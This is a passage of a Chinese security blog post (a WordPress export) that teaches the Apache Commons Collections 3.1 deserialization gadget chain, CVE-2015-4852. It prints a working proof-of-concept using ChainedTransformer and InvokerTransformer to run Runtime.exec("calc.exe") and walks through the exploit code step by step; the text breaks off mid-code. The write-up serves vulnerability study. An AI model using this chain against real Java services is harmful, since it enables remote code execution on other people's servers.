{"id":7502,"date":"2024-04-01T22:01:01","date_gmt":"2024-04-01T14:01:01","guid":{"rendered":""},"modified":"2024-04-01T22:01:01","modified_gmt":"2024-04-01T14:01:01","slug":"apache commons\u5305_JAVA\u53cd\u5e8f\u5217\u5316 - commons-collections - 1","status":"publish","type":"post","link":"https:\/\/mushiming.com\/7502.html","title":{"rendered":"apache commons\u5305_JAVA\u53cd\u5e8f\u5217\u5316 - commons-collections - 1"},"content":{"rendered":"
\n

\u4ee5\u4e0b\u6587\u7ae0\u6765\u6e90\u4e8e\u96f7\u795e\u4f17\u6d4b \uff0c\u4f5c\u8005lala<\/p>\n

No.1\u58f0\u660e<\/strong><\/p>\n

\u7531\u4e8e\u4f20\u64ad\u3001\u5229\u7528\u6b64\u6587\u6240\u63d0\u4f9b\u7684\u4fe1\u606f\u800c\u9020\u6210\u7684\u4efb\u4f55\u76f4\u63a5\u6216\u8005\u95f4\u63a5\u7684\u540e\u679c\u53ca\u635f\u5931\uff0c\u5747\u7531\u4f7f\u7528\u8005\u672c\u4eba\u8d1f\u8d23\uff0c\u96f7\u795e\u4f17\u6d4b\u4ee5\u53ca\u6587\u7ae0\u4f5c\u8005\u4e0d\u4e3a\u6b64\u627f\u62c5\u4efb\u4f55\u8d23\u4efb\u3002\u96f7\u795e\u4f17\u6d4b\u62e5\u6709\u5bf9\u6b64\u6587\u7ae0\u7684\u4fee\u6539\u548c\u89e3\u91ca\u6743\u3002\u5982\u6b32\u8f6c\u8f7d\u6216\u4f20\u64ad\u6b64\u6587\u7ae0\uff0c\u5fc5\u987b\u4fdd\u8bc1\u6b64\u6587\u7ae0\u7684\u5b8c\u6574\u6027\uff0c\u5305\u62ec\u7248\u6743\u58f0\u660e\u7b49\u5168\u90e8\u5185\u5bb9\u3002\u672a\u7ecf\u96f7\u795e\u4f17\u6d4b\u5141\u8bb8\uff0c\u4e0d\u5f97\u4efb\u610f\u4fee\u6539\u6216\u8005\u589e\u51cf\u6b64\u6587\u7ae0\u5185\u5bb9\uff0c\u4e0d\u5f97\u4ee5\u4efb\u4f55\u65b9\u5f0f\u5c06\u5176\u7528\u4e8e\u5546\u4e1a\u76ee\u7684\u3002<\/p>\n

No.2\u524d\u8a00<\/strong><\/p>\n

\u8fd9\u662f\u4e2a\u4eba\u5b66\u4e60java\u53cd\u5e8f\u5217\u5316\u7684\u7b2c\u4e00\u7bc7\u5229\u7528\u94fe\u7684\u6587\u7ae0\uff0c\u5c31\u597d\u50cfP\u725b\u8bf4\u7684\u4e0d\u77e5\u9053\u4e3a\u4ec0\u4e48\u7f51\u4e0a\u8bb2\u5230java\u53cd\u5e8f\u5217\u5316\u5b66\u4e60\uff0c\u4e0a\u6765\u5c31\u662fcc\u94fe\uff0c\u4f60\u77e5\u9053\u8fd9\u4e2a\u94fe\u5b83\u6709\u591a\u590d\u6742\u4e48.jpg\u3002\u840c\u65b0\u4e5f\u662f\u7406\u6240\u5f53\u7136\u7684\u8e29\u4e86\u8fd9\u4e2a\u5751\uff0c\u7136\u540e\u2026..\u5728\u4e00\u8def\u8d28\u7591\u81ea\u5df1\u667a\u5546\u548c\"\u6211\u4e0d\u670d\"\u7684\u60c5\u51b5\u4e0b\u8d9f\u4e86\u8fc7\u53bb\u3002<\/p>\n

\u8def\u96be\u884c\uff0c\u96be\u884c\uff0c\u603b\u5f52\u8981\u8d70\u3002<\/p>\n

\u8d70\u6765\uff0c\u56de\u671b\u53bb\uff0c\u5475\uff0c\u725b\u903c\u3002<\/p>\n

\u5728\u6b64\u6587\u4e2d\u662f\u4ee5\u4e00\u4e2a\u53ea\u4e86\u89e3java\u53cd\u5c04\u673a\u5236\u548c\u53cd\u5e8f\u5217\u5316\u5229\u7528\u70b9(readObject)\u7684\u89c6\u89d2\u53bb\u4e00\u70b9\u70b9\u590d\u73b0\u63a8\u5bfc\u4e86commons-collections\u3001jdk1.7\u7684poc\u7684\u6784\u9020\u3002<\/p>\n

\u540c\u65f6\u8bb0\u5f55\u4e0b\u4e86\u4e00\u4e2a\u4e2a\u8e29\u7684\u5751\uff0c\u518d\u722c\u51fa\u6765\uff0c\u518d\u8df3\u8fdb\u53bb\uff0c\u518d\u722c\u51fa\u6765\u7684\u5386\u7a0b\u3002<\/p>\n

\u5982\u679c\u4f60\u5177\u5907\u4e86\u53cd\u5c04\u673a\u5236\u548c\u53cd\u5e8f\u5217\u5316\u57fa\u672c\u539f\u7406\u7684\u77e5\u8bc6\uff0c\u540c\u65f6\u60f3\u5b66\u4e60cc\u94fe\u7684\u8bdd\uff0c\u4e2a\u4eba\u611f\u89c9\u662f\u8fd9\u7bc7\u6587\u662f\u518d\u9002\u5408\u4e0d\u8fc7\u4e86\u3002<\/p>\n

\u90a3\u4e48\u5f00\u59cb\u3002<\/p>\n

\u4e86\u89e3\u53cd\u5c04\u673a\u5236\u7684\u8bdd\uff0c\u6211\u4eec\u4f1a\u53d1\u73b0\u82e5\u5b58\u5728\u4e00\u4e2a\u56fa\u6709\u7684\u53cd\u5c04\u673a\u5236\u65f6\uff0c\u8f93\u5165\u53ef\u63a7\uff0c\u5c31\u53ef\u80fd\u5f62\u6210\u4efb\u610f\u51fd\u6570\u8c03\u7528\u7684\u60c5\u51b5\uff0c\u5177\u6709\u6781\u5927\u7684\u5371\u5bb3\u3002\u4f46\u5b9e\u9645\u4e0a\u771f\u7684\u6709\u5b58\u5728\u8fd9\u79cd\u60c5\u51b5\uff1a\u8fd9\u5c31\u662fcommons-collections-3.1 jar\u5305\uff0ccve\u7f16\u53f7\uff1acve-2015-4852<\/p>\n

\u5728\u5f00\u59cb\u4e4b\u524d\u6211\u4eec\u9700\u8981\u7406\u4e00\u4e0b\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684\u653b\u51fb\u6d41\u7a0b\uff1a<\/p>\n

    \n
  1. \u5ba2\u6237\u7aef\u6784\u9020payload(\u6709\u6548\u8f7d\u8377)\uff0c\u5e76\u8fdb\u884c\u4e00\u5c42\u5c42\u7684\u5c01\u88c5\uff0c\u5b8c\u6210\u6700\u540e\u7684exp(exploit-\u5229\u7528\u4ee3\u7801)<\/li>\n
  2. exp\u53d1\u9001\u5230\u670d\u52a1\u7aef\uff0c\u8fdb\u5165\u4e00\u4e2a\u670d\u52a1\u7aef\u81ea\u4e3b\u590d\u5199(\u4e5f\u53ef\u80fd\u662f\u4e5f\u6709\u7ec4\u4ef6\u590d\u5199)\u7684readobject\u51fd\u6570\uff0c\u5b83\u4f1a\u53cd\u5e8f\u5217\u5316\u6062\u590d\u6211\u4eec\u6784\u9020\u7684exp\u53bb\u5f62\u6210\u4e00\u4e2a\u6076\u610f\u7684\u6570\u636e\u683c\u5f0fexp_1(\u5265\u53bb\u7b2c\u4e00\u5c42)<\/li>\n
  3. \u8fd9\u4e2a\u6076\u610f\u6570\u636eexp_1\u5728\u63a5\u4e0b\u6765\u7684\u5904\u7406\u6d41\u7a0b(\u53ef\u80fd\u662f\u5728\u81ea\u4e3b\u590d\u5199\u7684readobject\u4e2d\u3001\u4e5f\u53ef\u80fd\u662f\u5728\u5916\u9762\u7684\u903b\u8f91\u4e2d)\uff0c\u4f1a\u6267\u884c\u4e00\u4e2aexp_1\u8fd9\u4e2a\u6076\u610f\u6570\u636e\u7c7b\u7684\u4e00\u4e2a\u65b9\u6cd5\uff0c\u5728\u65b9\u6cd5\u4e2d\u4f1a\u6839\u636eexp_1\u7684\u5185\u5bb9\u8fdb\u884c\u51fd\u5904\u7406\uff0c\u4ece\u800c\u4e00\u5c42\u5c42\u5730\u5265\u53bb(\u6216\u8005\u8bf4\u53d8\u5f62\u3001\u89e3\u6790)\u6211\u4eecexp_1\u53d8\u6210exp_2\u3001exp_3\u2026\u2026<\/li>\n
  4. \u6700\u540e\u5728\u4e00\u4e2a\u53ef\u6267\u884c\u4efb\u610f\u547d\u4ee4\u7684\u51fd\u6570\u4e2d\u6267\u884c\u6700\u540e\u7684payload\uff0c\u5b8c\u6210\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002<\/li>\n<\/ol>\n

    \u90a3\u4e48\u4ee5\u4e0a\u5927\u6982\u53ef\u4ee5\u5206\u6210\u4e09\u4e2a\u4e3b\u8981\u90e8\u5206\uff1a<\/p>\n

      \n
    1. payload\uff1a\u9700\u8981\u8ba9\u670d\u52a1\u7aef\u6267\u884c\u7684\u8bed\u53e5\uff1a\u6bd4\u5982\u8bf4\u5f39\u8ba1\u7b97\u5668\u8fd8\u662f\u6267\u884c\u8fdc\u7a0b\u8bbf\u95ee\u7b49\uff1b\u6211\u628a\u5b83\u79f0\u4e3a\uff1apayload<\/li>\n
    2. \u53cd\u5e8f\u5217\u5316\u5229\u7528\u94fe\uff1a\u670d\u52a1\u7aef\u4e2d\u5b58\u5728\u7684\u53cd\u5e8f\u5217\u5316\u5229\u7528\u94fe\uff0c\u4f1a\u4e00\u5c42\u5c42\u62e8\u5f00\u6211\u4eec\u7684exp\uff0c\u6700\u540e\u6267\u884cpayload\u3002(\u5728\u6b64\u7bc7\u4e2d\u5c31\u662fcommons-collections\u5229\u7528\u94fe)<\/li>\n
    3. readObject\u590d\u5199\u5229\u7528\u70b9\uff1a\u670d\u52a1\u7aef\u4e2d\u5b58\u5728\u7684\u53ef\u4ee5\u4e0e\u6211\u4eec\u6f0f\u6d1e\u94fe\u76f8\u63a5\u7684\u5e76\u4e14\u53ef\u4ee5\u4ece\u5916\u90e8\u8bbf\u95ee\u7684readObject\u51fd\u6570\u590d\u5199\u70b9\uff1b\u6211\u628a\u5b83\u79f0\u4e3areadObject\u590d\u5199\u5229\u7528\u70b9(\u81ea\u521b\u540d\u79f0\u2026)<\/li>\n<\/ol>\n

      No.3commons-collections-3.1<\/strong><\/p>\n

      \u9996\u5148\u6765\u770b\u770bcommons-collections\u9879\u76ee\u5427\u5b98\u7f51\u7b2c\u4e00\u6bb5\uff1a<\/p>\n

      Java commons-collections\u662fJDK 1.2\u4e2d\u7684\u4e00\u4e2a\u4e3b\u8981\u65b0\u589e\u90e8\u5206\u3002\u5b83\u6dfb\u52a0\u4e86\u8bb8\u591a\u5f3a\u5927\u7684\u6570\u636e\u7ed3\u6784\uff0c\u53ef\u4ee5\u52a0\u901f\u5927\u591a\u6570\u91cd\u8981Java\u5e94\u7528\u7a0b\u5e8f\u7684\u5f00\u53d1\u3002\u4ece\u90a3\u65f6\u8d77\uff0c\u5b83\u5df2\u7ecf\u6210\u4e3aJava\u4e2d\u516c\u8ba4\u7684\u96c6\u5408\u5904\u7406\u6807\u51c6\u3002<\/p>\n

      Apache Commons Collections\u662f\u4e00\u4e2a\u6269\u5c55\u4e86Java\u6807\u51c6\u5e93\u91cc\u7684Collection\u7ed3\u6784\u7684\u7b2c\u4e09\u65b9\u57fa\u7840\u5e93\uff0c\u5b83\u63d0\u4f9b\u4e86\u5f88\u591a\u5f3a\u6709\u529b\u7684\u6570\u636e\u7ed3\u6784\u7c7b\u578b\u5e76\u4e14\u5b9e\u73b0\u4e86\u5404\u79cd\u96c6\u5408\u5de5\u5177\u7c7b\u3002\u4f5c\u4e3aApache\u5f00\u6e90\u9879\u76ee\u7684\u91cd\u8981\u7ec4\u4ef6\uff0cCommons Collections\u88ab\u5e7f\u6cdb\u5e94\u7528\u4e8e\u5404\u79cdJava\u5e94\u7528\u7684\u5f00\u53d1\u3002\u5b83\u662f\u4e00\u4e2a\u57fa\u7840\u6570\u636e\u7ed3\u6784\u5305\uff0c\u540c\u65f6\u5c01\u88c5\u4e86\u5f88\u591a\u529f\u80fd\uff0c\u5176\u4e2d\u6211\u4eec\u9700\u8981\u5173\u6ce8\u4e00\u4e2a\u529f\u80fd\uff1a<\/p>\n

        \n
      • Transforming decorators that alter each object as it is added to the collection<\/li>\n
      • \u8f6c\u5316\u88c5\u9970\u5668\uff1a\u4fee\u6539\u6bcf\u4e00\u4e2a\u6dfb\u52a0\u5230collection\u4e2d\u7684object<\/li>\n<\/ul>\n

        Commons Collections\u5b9e\u73b0\u4e86\u4e00\u4e2aTransformedMap\u7c7b\uff0c\u8be5\u7c7b\u662f\u5bf9Java\u6807\u51c6\u6570\u636e\u7ed3\u6784Map\u63a5\u53e3\u7684\u4e00\u4e2a\u6269\u5c55\u3002\u8be5\u7c7b\u53ef\u4ee5\u5728\u4e00\u4e2a\u5143\u7d20\u88ab\u52a0\u5165\u5230\u96c6\u5408\u5185\u65f6\uff0c\u81ea\u52a8\u5bf9\u8be5\u5143\u7d20\u8fdb\u884c\u7279\u5b9a\u7684\u4fee\u9970\u53d8\u6362\uff0c\u5177\u4f53\u7684\u53d8\u6362\u903b\u8f91\u7531Transformer\u7c7b\u5b9a\u4e49\uff0cTransformer\u5728TransformedMap\u5b9e\u4f8b\u5316\u65f6\u4f5c\u4e3a\u53c2\u6570\u4f20\u5165\u3002org.apache.commons.collections.Transformer\u8fd9\u4e2a\u7c7b\u53ef\u4ee5\u6ee1\u8db3\u56fa\u5b9a\u7684\u7c7b\u578b\u8f6c\u5316\u9700\u6c42\uff0c\u5176\u8f6c\u5316\u51fd\u6570\u53ef\u4ee5\u81ea\u5b9a\u4e49\u5b9e\u73b0\uff0c\u6211\u4eec\u7684\u6f0f\u6d1e\u89e6\u53d1\u51fd\u6570\u5c31\u662f\u5728\u4e8e\u8fd9\u4e2a\u70b9\u3002<\/p>\n

        \u6f0f\u6d1e\u590d\u73b0\u9700\u8981\u4e0b\u8f7d3.1\u7248\u672c,\u8fdb\u53bb\u5bfb\u89c5\u4e00\u4e0b\u6e90\u7801\u548cjar\u5305\u90fd\u6709\u3002<\/p>\n

        \u7531\u4e8e\u6ca1\u6709\u627e\u5230\u6f0f\u6d1e\u7248\u672c3.1\u7684api\u8bf4\u660e\uff0c\u6211\u4eec\u53ef\u4ee5\u53c2\u80033.2.2\u7684api\u6587\u6863<\/p>\n

        No.4POC->\u5229\u7528\u94fe<\/strong><\/p>\n

        \u6211\u4eec\u5c06\u901a\u8fc7\u8c03\u8bd5POC\u5f97\u5230\u6f0f\u6d1e\u5229\u7528\u94fe\u7684\u8c03\u7528\u6808\uff0c\u987a\u4fbf\u4ecb\u7ecd\u4e00\u4e0b\u5404\u4e2a\u7c7b\uff0c\u518d\u901a\u8fc7\u5206\u6790\u8c03\u7528\u6808\u7684\u51fd\u6570\uff0c\u53cd\u63a8\u51faPOC\u6765\u63a2\u7a76\u5176\u4e2d\u7684\u5229\u7528\u539f\u7406\u3002<\/p>\n

        \u6211\u4eec\u5148\u770b\u4e00\u4e0b\u7f51\u4e0a\u7684POC\u4ee3\u7801\uff0c\u5982\u4e0b\uff1a<\/p>\n

        import org.apache.commons.collections.*;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;import java.util.HashMap;import java.util.Map;public class commons_collections_3_1 { public static void main(String args) throws Exception { \/\/\u6b64\u5904\u6784\u5efa\u4e86\u4e00\u4e2atransformers\u7684\u6570\u7ec4\uff0c\u5728\u5176\u4e2d\u6784\u5efa\u4e86\u4efb\u610f\u51fd\u6570\u6267\u884c\u7684\u6838\u5fc3\u4ee3\u7801Transformer transformers = new Transformer { new ConstantTransformer(Runtime.class), new InvokerTransformer(\"getMethod\", new Class {String.class, Class.class }, new Object {\"getRuntime\", new Class[0] }), new InvokerTransformer(\"invoke\", new Class {Object.class, Object.class }, new Object {null, new Object[0] }), new InvokerTransformer(\"exec\", new Class {String.class }, new Object {\"calc.exe\"})}; \/\/\u5c06transformers\u6570\u7ec4\u5b58\u5165ChaniedTransformer\u8fd9\u4e2a\u7ee7\u627f\u7c7bTransformer transformerChain = new ChainedTransformer(transformers); \/\/\u521b\u5efaMap\u5e76\u7ed1\u5b9atransformerChinaMap innerMap = new HashMap;innerMap.put(\"value\", \"value\"); \/\/\u7ed9\u4e88map\u6570\u636e\u8f6c\u5316\u94feMap outerMap = TransformedMap.decorate(innerMap, null, transformerChain); \/\/\u89e6\u53d1\u6f0f\u6d1eMap.Entry onlyElement = (Map.Entry) outerMap.entrySet.iterator.next; \/\/outerMap\u540e\u4e00\u4e32\u4e1c\u897f\uff0c\u5176\u5b9e\u5c31\u662f\u83b7\u53d6\u8fd9\u4e2amap\u7684\u7b2c\u4e00\u4e2a\u952e\u503c\u5bf9(value,value)\uff1b\u7136\u540e\u8f6c\u5316\u6210Map.Entry\u5f62\u5f0f\uff0c\u8fd9\u662fmap\u7684\u952e\u503c\u5bf9\u6570\u636e\u683c\u5f0fonlyElement.setValue(\"foobar\");}}<\/p>\n

        \u597d\u597d\u770b\u4ee3\u7801\u7684\u540c\u5b66\u80af\u5b9a\u4f1a\u610f\u8bc6\u5230\uff0c\u4ee5\u4e0a\u7684poc\u5176\u5b9e\u53ea\u5305\u62ec\u6211\u603b\u7ed3\u4e09\u8981\u7d20\u7684payload\u548c\u53cd\u5e8f\u5217\u5316\u5229\u7528\u94fe\u4e24\u8005\u3002\u800c\u5173\u952e\u7684readObject\u590d\u5199\u5229\u7528\u70b9\u6ca1\u6709\u5305\u542b\u5728\u5185\u3002\u4e8b\u5b9e\u786e\u5b9e\u5982\u6b64\u3002\u8fd9\u4e2apoc\u7684\u590d\u5199\u5229\u7528\u70b9\u662fsun.reflect.annotation.AnnotationInvocationHandler\u7684readObject\uff0c\u4f46\u662f\u6211\u4eec\u5148\u7cbe\u7b80\u4ee3\u7801\u5173\u6ce8payload\u548c\u5229\u7528\u94fe\uff0c\u6700\u540e\u518d\u52a0\u4e0areadObject\u590d\u5199\u70b9\u3002<\/p>\n

        \u8c03\u8bd5\u4ee5\u4e0aPOC\uff0c\u5f97\u5230\u4e24\u79cd\u8c03\u7528\u6808\uff1a<\/p>\n

        \u6f0f\u6d1e\u94fe<\/strong><\/p>\n

        Map.Entry\u5176\u5b9e\u5c31\u662f\u952e\u503c\u5bf9\u7684\u6570\u636e\u683c\u5f0f\uff0c\u5176setValue\u51fd\u6570\u5982\u4e0bAbstracInputCheckedMapDecorator.class<\/p>\n

        public Object setValue(Object value) {value = this.parent.checkSetValue(value);\/\/\u8fdb\u5165\u6b64\u5904return super.entry.setValue(value);}<\/p>\n

        TransformedMap\u662f\u4e00\u79cd\u91cd\u5199map\u7c7b\u578b\u7684set\u51fd\u6570\u548cMap.Entry\u7c7b\u578b\u7684setValue\u51fd\u6570\u53bb\u8c03\u7528\u8f6c\u6362\u94fe\u7684Map\u7c7b\u578b\u3002TransformedMap.class<\/p>\n

        protected Object checkSetValue(Object value) { return this.valueTransformer.transform(value);\/\/\u8fdb\u5165\u6b64\u5904}<\/p>\n

        \u7531\u4e8eTransformedMap\u5177\u6709commons_collections\u7684\u8f6c\u53d8\u7279\u6027\uff0c\u5f53\u8d4b\u503c\u4e00\u4e2a\u952e\u503c\u5bf9\u7684\u65f6\u5019\u4f1a\u81ea\u52a8\u5bf9\u8f93\u5165\u503c\u8fdb\u884c\u9884\u8bbe\u7684Transformer\u7684\u8c03\u7528\u3002<\/p>\n

        ChainedTransformer.class\uff1a\u8fd9\u91cc\u6709\u4e00\u4e2a<\/p>\n

        public Object transform(Object object) { for(int i = 0; i < this.iTransformers.length; ++i) { \/\/\u5faa\u73af\u8fdb\u5165\u6b64\u5904\uff0c\u5148\u8fdb\u51651\u6b21ConstantTransformer.class\uff0c\u518d3\u6b21InvokerTransformer.classobject = this.iTransformers[i].transform(object); \/\/\u53e6\u5916\u9700\u8981\u6ce8\u610f\u5728\u6570\u7ec4\u7684\u5faa\u73af\u4e2d\uff0c\u524d\u4e00\u6b21transform\u51fd\u6570\u7684\u8fd4\u56de\u503c\uff0c\u4f1a\u4f5c\u4e3a\u4e0b\u4e00\u6b21transform\u51fd\u6570\u7684object\u53c2\u6570\u8f93\u5165\u3002} return object;}<\/p>\n

        transform\u51fd\u6570\u662f\u4e00\u4e2a\u63a5\u53e3\u51fd\u6570\uff0c\u5728\u4e0a\u9762\u7684\u5faa\u73af\u4e2d\u8fdb\u5165\u4e86\u4e0d\u540c\u7684\u51fd\u6570\u3002\u5148\u662f1\u6b21ConstantTransformer.class<\/p>\n

        public Object transform(Object input) { return this.iConstant;}<\/p>\n

        \u518d\u662f\u8fdb\u5165\u4e86InvokerTransformer.class\uff0c\u770b\u5230\u8fd9\u4e2a\u5c31\u4f1a\u53d1\u73b0\u6709\u70b9\u4e1c\u897f\u4e86\u3002<\/p>\n

        public Object transform(Object input) { if (input == null) { return null;} else { try { \/\/\u83b7\u53d6input\u5bf9\u8c61\u7684classClass cls = input.getClass; \/\/\u6839\u636eiMethodName\u3001iParamTypes\u9009\u62e9cls\u4e2d\u7684\u4e00\u4e2a\u65b9\u6cd5Method method = cls.getMethod(this.iMethodName, this.iParamTypes); \/\/\u6839\u636eiArgs\u53c2\u6570\u8c03\u7528\u8fd9\u4e2a\u65b9\u6cd5return method.invoke(input, this.iArgs);} catch (NoSuchMethodException var5) { throw new FunctorException(\"InvokerTransformer: The method '\" + this.iMethodName + \"' on '\" + input.getClass + \"' does not exist\");} catch (IllegalAccessException var6) { throw new FunctorException(\"InvokerTransformer: The method '\" + this.iMethodName + \"' on '\" + input.getClass + \"' cannot be accessed\");} catch (InvocationTargetException var7) { throw new FunctorException(\"InvokerTransformer: The method '\" + this.iMethodName + \"' on '\" + input.getClass + \"' threw an exception\", var7);}}}}<\/p>\n

        \u660e\u663e\u7684\u53cd\u5c04\u673a\u5236\uff0c\u53ef\u89c1InvokerTransformer\u5c31\u662f\u6211\u4eec\u7684\u89e6\u53d1\u4efb\u610f\u4ee3\u7801\u6267\u884c\u5904\uff0c\u6211\u4eec\u770b\u770b\u6e90\u7801\u4e2d\u7684\u6587\u4ef6\u63cf\u8ff0\uff1a\u5148\u770b\u770b\u6211\u4eec\u9700\u8981\u5173\u6ce8\u7684InvokerTransformer\u7c7b\u7684\u63cf\u8ff0(\u5728jar\u5305\u4e2d\u662f\u627e\u4e0d\u5230\u63cf\u8ff0\u4fe1\u606f\u7684\uff0c\u53ef\u4ee5\u901a\u8fc7\u4e0b\u8f7d\u5b98\u65b9\u6e90\u7801\u5f97\u5230)\uff1a<\/p>\n

        \/*** Transformer implementation that creates a new object instance by reflection.*\u901a\u8fc7\u53cd\u5c04\u673a\u5236\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u5bf9\u8c61\u5b9e\u4f8b\u7684\u8f6c\u6362\u5668\u5b9e\u73b0<\/p>\n

        \u6211\u4eec\u53ef\u4ee5\u8fd9\u91cc\u6709\u7ecf\u5178\u7684\u53cd\u5c04\u673a\u5236\u8c03\u7528\uff0c\u5728\u7ec6\u8282\u5206\u6790\u524d\u6211\u4eec\u5148\u6574\u7406\u4e00\u4e0b\u8c03\u7528\u6808\uff0c\u4f46\u4e0d\u9700\u8981\u5f88\u7406\u89e3\u3002<\/p>\n

        Map.Entry \u7c7b\u578bsetValue(\"foobar\")=> AbstracInputCheckedMapDecorator.setValue=> TransformedMap.checkSetValue=> ChainedTransformer.transform(Object object)\u6839\u636e\u6570\u7ec4\uff0c\u5148\u8fdb\u5165 => ConstantTransformer.transform(Object input)\u518d\u8fdb\u5165 => InvokerTransformer.transform(Object input)<\/p>\n

        No.5\u91cd\u6784POC<\/strong><\/p>\n

        \u9996\u5148\u660e\u786e\u6211\u4eec\u7684\u6700\u7ec8\u76ee\u7684\u662f\u4e3a\u4e86\u6267\u884c\u8bed\u53e5Runtime.getRuntime.exec(\"calc.exe\");<\/p>\n

          \n
        • Runtime.getRuntime\uff1a\u83b7\u53d6\u4e00\u4e2aRuntime\u7684\u5b9e\u4f8b<\/li>\n
        • exec\uff1a\u8c03\u7528\u5b9e\u4f8b\u7684exec\u51fd\u6570<\/li>\n<\/ul>\n

          \u56e0\u4e3a\u6f0f\u6d1e\u51fd\u6570\u6700\u540e\u662f\u901a\u8fc7\u53cd\u5c04\u673a\u5236\u8c03\u7528\u4efb\u610f\u8fd9\u4e2a\u8bed\u53e5\u5148\u8f6c\u5316\u6210\u53cd\u5c04\u673a\u5236\u5982\u4e0b(\u540e\u9762\u9700\u8981\u7528\u5230)\uff1a<\/p>\n

          \u81f3\u4e8e\u5982\u4f55\u6784\u9020\u53cd\u5c04\u673a\u5236\u7684\u8bed\u53e5\uff0c\u53c2\u8003\u5f80\u671f\u6587\u7ae0java\u53cd\u5c04\u673a\u5236<\/p>\n

          Class.forName(\"java.lang.Runtime\").getMethod(\"exec\", String.class).invoke(Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(Class.forName(\"java.lang.Runtime\"))\/\/\u6b64\u5904\u5728\u83b7\u53d6\u5b9e\u4f8b,\"calc.exe\")<\/p>\n

          \u7b2c\u4e00\u6b65 InvokerTransformer<\/strong><\/p>\n

          \u518d\u56de\u770b\u53cd\u5c04\u673a\u5236\u89e6\u53d1\u51fd\u6570InvokerTransformer\u7c7b\u7684transform(Object input)(\u505a\u4e86\u7b80\u5316\u5904\u7406\uff0c\u53ea\u7559\u53d6\u91cd\u70b9\u90e8\u5206)\uff1a<\/p>\n

          public Object transform(Object input) {Class cls = input.getClass;Method method = cls.getMethod(this.iMethodName, this.iParamTypes); return method.invoke(input, this.iArgs);<\/p>\n

          \u901a\u8fc7\u6784\u9020\u7684\u53cd\u5c04\u673a\u5236\u4ee5\u53ca\u4ee5\u4e0a\u4ee3\u7801\u8fdb\u884c\u586b\u7a7a\uff0c\u53ef\u4ee5\u5f97\u51fa\u5f53\u53d8\u91cf\u7b49\u4e8e\u4ee5\u4e0b\u503c\u65f6\uff0c\u53ef\u5f62\u6210\u547d\u4ee4\u6267\u884c\uff1a<\/p>\n

          Object input=Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(Class.forName(\"java.lang.Runtime\"));this.iMethodName=\"exec\"this.iParamTypes=String.classthis.iArgs=\"calc.exe\"<\/p>\n

          \u90a3\u4e48\u5728InvokerTransformer\u7c7b\u6e90\u7801\u4e2d\u6211\u4eec\u53ef\u4ee5\u627e\u5230\u8d4b\u503cthis.iMethodName,this.iParamTypes,this.iArgs\u7684\u6784\u9020\u51fd\u6570:<\/p>\n

          public InvokerTransformer(String methodName, Class paramTypes, Object args) { this.iMethodName = methodName; this.iParamTypes = paramTypes; this.iArgs = args;}<\/p>\n

          \u6211\u4eec\u5c31\u53ef\u4ee5\u6784\u5efa\u4ee5\u4e0b\u6d4b\u8bd5\u4ee3\u7801\u76f4\u63a5\u8c03\u7528InvokerTransformer\u901a\u8fc7\u53cd\u5c04\u6267\u884c\u4efb\u610f\u547d\u4ee4\uff1a\u4e0b\u9762\u5f00\u59cb\u8bd5\u4e00\u4e0b\uff1a<\/p>\n

          public static void main(String args) throws Exception { \/\/\u901a\u8fc7\u6784\u9020\u51fd\u6570\uff0c\u8f93\u5165\u5bf9\u5e94\u683c\u5f0f\u7684\u53c2\u6570\uff0c\u5bf9iMethodName\u3001iParamTypes\u3001iArgs\u8fdb\u884c\u8d4b\u503cInvokerTransformer a = new InvokerTransformer( \"exec\", new Class{String.class}, new String{\"calc.exe\"}); \/\/\u6784\u9020inputObject input=Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(Class.forName(\"java.lang.Runtime\")); \/\/\u6267\u884ca.transform(input);}<\/p>\n

          \n \"apache\n <\/div>\n

          \u5728\u7b2c\u4e8c\u6b65\u4e4b\u524d<\/strong><\/p>\n

          \u5f39\u51fa\u4e86\u8ba1\u7b97\u5668\uff01\u597d\u50cf\u5f88\u5389\u5bb3\u7684\u6837\u5b50\uff01\u7136\u540e\u6211\u4eec\u6765\u6a21\u62df\u4e00\u4e0b\u5229\u7528\u573a\u666f\uff1a<\/p>\n

            \n
          • \u4e3a\u4e86\u65b9\u4fbf\uff0c\u653b\u51fb\u8005\u53d7\u5bb3\u8005\u5199\u5728\u540c\u4e00\u51fd\u6570\u4e2d<\/li>\n
          • \u4f7f\u7528\u6587\u4ef6\u5199\u5165\uff0c\u4ee3\u66ff\u7f51\u7edc\u4f20\u8f93<\/li>\n<\/ul>\n

            \u7531\u4e8eInvokerTransformer\u7ee7\u627f\u4e86Serializable\u7c7b\uff0c\u662f\u53ef\u4ee5\u6210\u529f\u5e8f\u5217\u5316\u7684<\/p>\n

            public static void main(String args) throws Exception { \/\/\u6a21\u62df\u653b\u51fb\/\/1.\u5ba2\u6237\u7aef\u6784\u9020\u5e8f\u5217\u5316payload\uff0c\u4f7f\u7528\u5199\u5165\u6587\u4ef6\u6a21\u62df\u53d1\u5305\u653b\u51fbInvokerTransformer a = new InvokerTransformer( \"exec\", new Class{String.class}, new String{\"calc.exe\"});FileOutputStream f = new FileOutputStream(\"payload.bin\");ObjectOutputStream fout = new ObjectOutputStream(f);fout.writeObject(a); \/\/2.\u670d\u52a1\u7aef\u4ece\u6587\u4ef6\u4e2d\u8bfb\u53d6payload\u6a21\u62df\u63a5\u53d7\u5305\uff0c\u7136\u540e\u89e6\u53d1\u6f0f\u6d1e\/\/\u670d\u52a1\u7aef\u53cd\u5e8f\u5217\u5316payload\u8bfb\u53d6FileInputStream fi = new FileInputStream(\"payload.bin\");ObjectInputStream fin = new ObjectInputStream(fi); \/\/\u795e\u5947\u7b2c\u4e00\u5904\uff1a\u670d\u52a1\u7aef\u9700\u8981\u81ea\u4e3b\u6784\u9020\u6076\u610finputObject input=Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(Class.forName(\"java.lang.Runtime\")); 